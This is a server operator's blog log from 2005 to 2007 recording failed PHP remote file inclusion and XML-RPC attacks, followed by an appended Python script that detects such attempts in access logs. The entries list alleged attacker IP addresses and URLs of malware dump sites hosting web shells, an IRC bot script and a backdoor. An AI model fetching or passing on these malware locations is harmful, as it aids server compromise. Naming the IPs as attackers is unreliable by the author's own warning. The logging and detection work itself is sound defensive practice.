The Return of The Cracker Kiddy aka Script Kiddy

12 May 2006: I have been a little lazy in reporting the script kiddo incidents, but now back. Seems I gotta find a way to automate this crap.

19 Feb 2006: Things seem to have slowed down, except for an occasional attempt, nothing much. Seems the kids have found better ways to hide or are busy somewhere else. Anyway I will do a detailed check in a day or so.

IMPORTANT (22 Jan 2006): Now I will not manually update this list. For full exposure please wait till I have time to automate this process.

Here you will find a list of kiddies/ ankle biters who attempted some sort of behavior I found annoying (cracking attempts). And if they are listed here that basically means they were unsuccessful (I hope so). If they had been successful I would not be sitting here listing their names but rather going back to the archives and restoring the server. Well I am keeping my fingers crossed and server updated. Let's see how long the rat race lasts.

This is in the form of a log, most recent events on top of the page. Many old events have not been listed. Some events will not be listed unless I find it really annoying or interesting.

WARNING: The information may be totally baseless and incorrect as I am relying on the information provided by my computer. Don't trust anything. Also note that the tools may have been removed from the cracker dump site.

NOTE: BTW if you are looking for more information on how to become a script kiddy and own a server read this The Official Script Kiddy Howto.

Tuesday, May 22, 2007 - 11:56pm Appears to be Originating from: 216.120.237.36 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component FacileForm Crack Tool Download Site: http://gnuworld.evolink.ro/xxx/. So what this guy is doing: first it tests for a simple script insertion using this very innocent looking script. If successful, it then tries the actual payload.
Saturday, May 12, 2007 - 9:13pm Appears to be Originating from: 138.48.4.37 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component FacileForm Crack Tool Download Site: http://lamerma.com.ve/n00gr00d.txt. Just a lame PHP code inclusion test.
Saturday, May 12, 2007 - 2:50pm Appears to be Originating from: 88.84.133.139, 209.172.44.132 and 193.148.45.19 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla component facileform Crack Tool Download Site: http://www.x666-01.nm.ru/57.
Saturday, May 12, 2007 - 9:12am Appears to be Originating from: 217.172.182.28 Type of Attack: PHP Remote file inclusion Target Applications: 4nGallery Crack Tool Download Site: http://www.nbbsworld.de/downloads/files/ciola.txt. Lame PHP code inclusion test.
Saturday, May 12, 2007 - 9:02am Appears to be Originating from: 87.28.206.35 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://lamerma.com.ve/n00gr00d.txt. Just a lame PHP code inclusion test.
Friday, March 30, 2007 - 12:46am Appears to be Originating from: 84.244.132.110 Type of Attack: PHP Remote file inclusion Target Applications: 4nGallery Crack Tool Download Site: http://rvbnet.nl/administrator/components/com_facileforms/change.txt.
Saturday, March 24, 2007 - 8:47pm Appears to be Originating from: 207.58.184.58 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://www.xboxchannel.altervista.org/AreaRiservata.txt.
Friday, March 23, 2007 - 11:37pm Appears to be Originating from: 217.173.42.194 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://oppium.interfree.it/id.txt.
Saturday, March 17, 2007 - 8:09am Appears to be Originating from: 81.214.173.3 Type of Attack: PHP Remote file inclusion Target Applications: 4nAlbum Crack Tool Download Site: http://hapg.org/isko.dat.
Friday, March 16, 2007 - 9:06pm Appears to be Originating from: 201.50.21.80 Type of Attack: PHP Remote file inclusion Target Applications: Mambo Module Forum http://wildbeats.net/cmd.txt.
Friday, March 16, 2007 - 3:19am Appears to be Originating from: 209.200.229.202 Type of Attack: PHP Remote file inclusion Target Applications: xGallery Crack Tool Download Site: http://www.nykola.ch/Sefirot_r0x/r57.txt.
Thursday, March 15, 2007 - 10:00pm Appears to be Originating from: 208.101.40.162 Type of Attack: PHP Remote file inclusion Target Applications: 4nAlbum Crack Tool Download Site: http://www.middleriver.k12.mn.us/poll/db/ind.jpg (Right click and view source, it is not a JPG).
Saturday, January 13, 2007 - 2:08am Appears to be Originating from: 201.32.246.172 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Crack Tool Download Site: http://wildbeats.net/cmd.txt.
Friday, January 5, 2007 - 8:39pm, 10:01pm Appears to be Originating from: 201.32.188.94 and 201.32.208.153 Type of Attack: PHP Remote file inclusion Target Applications: PHPBB Forum and Coppermine Crack Tool Download Site: http://wildbeats.net/cmd.txt. The unusual thing about the crack tool in question is the advertising system in place, maybe the original script kiddy wants to make some money by displaying advertisements inside the crack tool script. Target audiences for the advertisements "Script Kiddies".
Thursday, December 28, 2006 - 04:56 and Saturday, December 30, 2006 - 00:05 Appears to be Originating from: 85.98.78.104 and 81.215.241.87 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component BaBackup (Tar.php) Crack Tool Download Site: http://www.yourcopysolution.com/tool20.dat.
Thursday, December 28, 2006 - 03:15, 18:04, 18:18 Appears to be Originating from: 70.87.63.234, 193.25.197.81 and 70.87.63.234 Type of Attack: PHP Remote file inclusion TEST Target Applications: Mambo/ Joomla Component Simpleboard Crack Tool Download Site: http://thebesthack.altervista.org/soka.txt.
Sunday, December 17, 2006 - 18:45 Appears to be Originating from: 85.101.25.114 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla Component Remository Crack Tool Download Site: http://www.nyers.hu/cmd.txt.
Friday, December 8, 2006 - 20:08 Appears to be Originating from: 70.87.63.234 Type of Attack: PHP Remote file inclusion Target Applications: com_remository for Mambo/ Joomla Crack Tool Download Site: http://thebesthack.altervista.org/soka.txt. Though not exactly a crack tool, but a possible script for testing PHP code injection.
Saturday, November 25, 2006 - 00:28 - 00:24 Appears to be Originating from: 85.99.183.229 Type of Attack: PHP Remote file inclusion Target Applications: a4Album Photo Album and MyEGallery Crack Tool Download Site: http://hackharekat.com/shell/r57.txt and http://www.nyers.hu/cmd.txt.
Tuesday, November 14, 2006 - 03:29 Appears to be Originating from: 81.177.34.236 Type of Attack: PHP Remote file inclusion Target Applications: Simple Board Component for Mambo/ Joomla Crack Tool Download Site: http://it.ismico.org/cache/rmod.txt. Webmaster has been informed using the available online contact form.
Tuesday, October 24, 2006 - 23:12 Appears to be Originating from: 83.223.107.18 Type of Attack: PHP Remote file inclusion Target Applications: Simple Board Component for Mambo/ Joomla Crack Tool Download Site: http://realhack.altervista.org/iniez.txt. This is not actually a crack script, but the kiddo seems to be testing the waters.
Monday, October 23, 2006 - 04:48, 04:51, 05:05 Appears to be Originating from: 81.214.161.234 Type of Attack: PHP Remote file inclusion Target Applications: Mambo Weather module, Simple Board Component, Remository component for Mambo/ Joomla Crack Tool Download Site: http://hbags.com/tool25.dat.
Friday, October 20, 2006 - 22:48, 23:12 Appears to be Originating from: 85.101.78.207 Type of Attack: PHP Remote file inclusion Target Applications: PHP Nuke 4nAlbums Module Crack Tool Download Site: http://www.nyers.hu/cmd.txt.
Thursday, September 28, 2006 - 16:53 to 20:47 Appears to be Originating from: 200.238.73.213 Appears to be Originating from: 200.153.146.120 Appears to be Originating from: 148.245.181.4 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB Forum/ My EGallery/ Coppermine Crack Tool Download Site: http://simssuisse.com/cmd.txt.
Thursday, September 28, 2006 - 09:18 Appears to be Originating from: 148.245.181.4 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB Forum Crack Tool Download Site: http://simssuisse.com/cmd.txt.
Thursday, September 28, 2006 - 04:25 Appears to be Originating from: 81.215.245.251 Type of Attack: PHP Remote file inclusion Target Applications: Help Management Component for Joomla/ Mambo Crack Tool Download Site: http://addictivebehavior.net/tool25.dat.
Tuesday, September 26, 2006 - 17:09 Appears to be Originating from: 81.214.161.144 Type of Attack: PHP Remote file inclusion Target Applications: Server Stat Component for Joomla/ Mambo Crack Tool Download Site: http://andyburnett.net/tool20.dat.
Sunday, September 24, 2006 - 16:02 Originating from: 195.225.177.6 Type of Attack: Blog Comment Spammer (On an average 100-200 comments per day, I think I will have to block them) Target Applications: Blog Comments
Friday, August 4, 2006 - 07:57 Appears to be Originating from: 85.98.83.41 Type of Attack: PHP Remote file inclusion Target Applications: Forum Component for Joomla/ Mambo Crack Tool Download Site: http://61.1.197.244/x/tool25.txt.
Friday, August 4, 2006 - 03:48 Appears to be Originating from: 201.79.240.176 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Photo Gallery Crack Tool Download Site: http://www.sdpescadoresteruel.com/cmd.txt.
Thursday, August 3, 2006 - 05:21 Appears to be Originating from: 201.50.186.69 Type of Attack: PHP Remote file inclusion
Tuesday, August 1, 2006 - 23:02 to Wednesday, August 2, 2006 - 20:29 Appears to be Originating from: 81.215.179.76 Appears to be Originating from: 85.98.83.132 Type of Attack: PHP Remote file inclusion
Wednesday, July 19, 2006 - 08:37 Appears to be Originating from: 85.98.99.33 Type of Attack: PHP Remote file inclusion Target Applications: SMF and Loudmouth for Mambo/ joomla Crack Tool Download Site: http://61.1.197.244/x/tool25.txt.
Tuesday, July 18, 2006 - 17:26 Appears to be Originating from: 85.98.98.150 Type of Attack: PHP Remote file inclusion Target Applications: Simpleboard and Sitemap for Mambo/ joomla Crack Tool Download Site: http://xpl.netmisphere2.com/tool25.dot, save as text file to view code.
Tuesday, July 18, 2006 - 02:20 Appears to be Originating from: 201.50.194.212 Type of Attack: PHP Remote file inclusion Target Applications: PHPBB for Mambo/ joomla Crack Tool Download Site: http://portal.runet.hu/albums/cmd.txt.
Sunday, July 9, 2006 - 04:23 Appears to be Originating from: 85.98.112.104 Type of Attack: PHP Remote file inclusion Target Applications: PHP BB and Simple Board component for Mambo/ joomla Crack Tool Download Site: http://www.freewebtown.com/england90/tool25.gif, save as text file to view code.
Saturday, July 8, 2006 - 10:52 Appears to be Originating from: 201.79.238.153 Type of Attack: PHP Remote file inclusion Target Applications: Coppermine Photo Gallery, PHP BB Crack Tool Download Site: http://portal.runet.hu/albums/cmd.txt
Saturday, July 8, 2006 - 07:08 Appears to be Originating from: 85.98.81.34 Type of Attack: PHP Remote file inclusion Target Applications: Mambo/ Joomla CMS module Gallery Crack Tool Download Site: http://www.ajadp.net/tool25.dat
Tuesday, July 4, 2006 - 10:55 Appears to be Originating from: 200.165.184.59 Type of Attack: PHP Remote file inclusion Target Applications: JAF CMS (http://jaf-cms.sourceforge.net/) Crack Tool Download Site: http://www.gewerbeverein-flachsmeer.de/modules/4nAlbum/album/cmd.txt
Sunday, June 4, 2006 - 23:30 Target Applications: awstat Appears to be Originating from: 213.206.91.9
Unknown Date Target Applications: PHP postnuke, myegallery, phpBB, mambo etc etc Appears to be Originating from: 64.90.177.252 85.214.38.146 81.169.134.50 217.171.192.14 82.165.251.158 80.154.33.74 69.10.137.228 58.26.6.6 85.119.158.42 and many others Crack Tool Download Site: http://usareother.tripod.com/asc/tool.gif (Right click, save and open in some text editor) http://ns.powernet-bg.net/maps/cmd.txt http://81.56.218.236/cmd.txt http://ns.powernet-bg.net/maps/but2.txt (A perl script to control a server using IRC) http://81.56.218.236/mambes.txt
Thursday, March 16, 2006 - 22:28 Target Applications: PHP postnuke, myegallery, phpBB, etc etc Appears to be Originating from: 201.9.103.58 Crack Tool Download Site: http://bkbhq.com/images/cmd.txt http://200.72.130.29/cmd.gif (right click and save as, then view in a text editor)
Tuesday, December 20, 2005 - 21:45 to Wednesday, December 21, 2005 - 22:31 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat, PHPbb etc etc Appears to be Originating from: 72.29.102.139 Appears to be Originating from: 211.100.12.103 Appears to be Originating from: 218.3.207.44 Appears to be Originating from: 24.139.31.72 Appears to be Originating from: 24.77.190.47 Appears to be Originating from: 24.130.166.124 All too common attacks with all kinds of permutations and combinations. The favourite crack tool dump site is till date the most popular http://81.174.26.111/cmd.gif and a few others that I didn't have the time to check.
Tuesday, December 20, 2005 - 20:32 Appears to be Originating from: 61.66.208.8 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://200.72.130.29/cmd.gif and 66.235.205.212/back
Tuesday, December 20, 2005 - 13:36 Appears to be Originating from: 219.136.249.133 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat etc etc
Tuesday, December 20, 2005 - 07:32 Appears to be Originating from: 200.27.70.37 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat etc etc
Tuesday, December 20, 2005 - 00:11 Appears to be Originating from: 72.29.71.179 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://81.174.26.111/cmd.gif (seems to have been removed now, it was there a few hours back)
Monday, December 19, 2005 - 23:50 Appears to be Originating from: 82.108.214.170 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat etc
Monday, December 19, 2005 - 19:12 Appears to be Originating from: 80.81.4.168 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat etc
Monday, December 19, 2005 - 06:30 Appears to be Originating from: 195.134.100.14 Type of Attack: PHP XML RPC code injection, Awstat Target Applications: mambo, wordpress, phpgroupware, awstat, PHPbb etc etc Crack Tool Download Site: http://81.174.26.111/cmd.gif (seems to have been removed now, it was there)
Exactly Similar Attacks Have been Carried out by the following:
Sunday, December 11, 2005 - 06:03 Appears to be Originating from: 81.88.224.91 Type of Attack: PHP XML RPC code injection Target Applications: mambo, wordpress, phpgroupware etc etc
Friday, December 2, 2005 - 01:43 Appears to be Originating from: 82.70.213.245 Type of Attack: PHP xmlrpc code injection Target Application: wordpress, drupal, pawon(?) and other random applications that use xmlrpc Tried What: Tried the xmlrpc code injection.
Tuesday, November 22, 2005 - 08:34 Appears to be Originating from: 207.224.30.187 Type of Attack: PHP XSS Target Application: awstat Tried What: Download and install of a backdoor named listen from 24.224.174.18 (this host right now seems down, so not sure if this is the dump site of kiddy)
Saturday, November 19, 2005 - 09:56 to 15:06 Hrs Appears to be Originating From: 65.203.134.100 Type of Attack: PHP XSS Target Application: Mambo and other CMS Crack Tool Download Site: http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt http://69.16.196.38/~doctord/.../t.txt This seems to have been removed. http://83.149.106.31/~max4/.../ I have reported regarding the above dump site to an email address, that I obtained from the whois information for the domain name associated with the above IP, but still nothing even after 6 days of reporting the issue. Well...
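
An added example, not part of the original post: one way to automate the kind of log kept above, by scanning web server access-log lines for query parameters whose value is a remote URL (the pattern behind the PHP remote file inclusion attempts listed) and grouping source addresses by dump site. The log lines, addresses, domains and the `base_path`/`inc` parameter names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache/NCSA common or combined format: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
IMAGE_EXT = ('.gif', '.jpg', '.jpeg', '.png')

# Constructed sample lines: documentation IP ranges, example domains, hypothetical parameters.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2007:21:13:05 +0000] "GET /index.php?option=com_example&base_path=http://files.example.org/test.txt? HTTP/1.1" 404 512',
    '198.51.100.7 - - [12/May/2007:21:15:40 +0000] "GET /gallery/view.php?id=7 HTTP/1.1" 200 8123',
    '198.51.100.23 - - [12/May/2007:22:01:11 +0000] "GET /index.php?base_path=http%3A%2F%2Ffiles.example.org%2Ftest.txt%3F HTTP/1.0" 200 3301',
    '203.0.113.5 - - [13/May/2007:02:50:09 +0000] "GET /album.php?inc=HTTP://img.example.net/pic.gif? HTTP/1.1" 200 3301',
]

def find_rfi_attempts(lines):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        source, when, target, status = m.groups()
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F... value is caught too
        for param, value in parse_qsl(target.partition('?')[2]):
            if not REMOTE_RE.match(value):
                continue
            site = value.rstrip('?')  # drop trailing '?' so identical sites group together
            hits.append({
                'when': when, 'source': source, 'param': param,
                'dump_site': site, 'status': int(status),
                # text file served under an image extension, as several entries above note
                'disguised': site.lower().partition('?')[0].endswith(IMAGE_EXT),
            })
    return hits

def group_by_dump_site(hits):
    """Map each dump-site URL to the sorted source addresses that referenced it."""
    groups = defaultdict(set)
    for h in hits:
        groups[h['dump_site']].add(h['source'])
    return {site: sorted(sources) for site, sources in groups.items()}

if __name__ == '__main__':
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(h['when'], h['source'], h['param'], h['dump_site'], h['status'], h['disguised'])
```

The recorded status is the server's response code only; a 200 does not by itself show that the inclusion worked, so each hit still needs the kind of manual check described in the entries above.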